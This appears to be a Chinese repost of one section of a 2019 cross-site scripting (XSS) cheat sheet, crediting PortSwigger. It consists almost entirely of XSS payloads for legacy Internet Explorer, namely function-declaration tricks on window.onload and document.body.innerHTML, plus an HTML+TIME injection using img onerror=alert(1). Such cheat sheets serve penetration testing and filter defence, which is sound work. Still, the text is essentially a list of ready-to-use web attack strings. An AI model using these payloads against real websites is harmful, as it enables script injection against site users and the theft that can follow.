跨站脚本(XSS)备忘单-2019版 (8)

IE中较旧版本的函数中支持的事件处理程序

<script> function window.onload(){ alert(1); } </script> <script> function window::onload(){ alert(1); } </script> <script> function window.location(){ } </script> <body> <script> function/*<img src=http://www.likecs.com/1 onerror=alert(1)>*/document.body.innerHTML(){} </script> </body> <body> <script> function document.body.innerHTML(){ x = "<img src=http://www.likecs.com/1 onerror=alert(1)>"; } </script> </body>

GreyMagic HTML + time漏洞利用(即使在5 docmode下也不再起作用)

<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<img src=http://www.likecs.com/1 onerror=alert(1)>"> </BODY></HTML>

原文地址:https://portswigger.net/web-security/cross-site-scripting/cheat-sheet

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:https://www.heiqu.com/zyfysd.html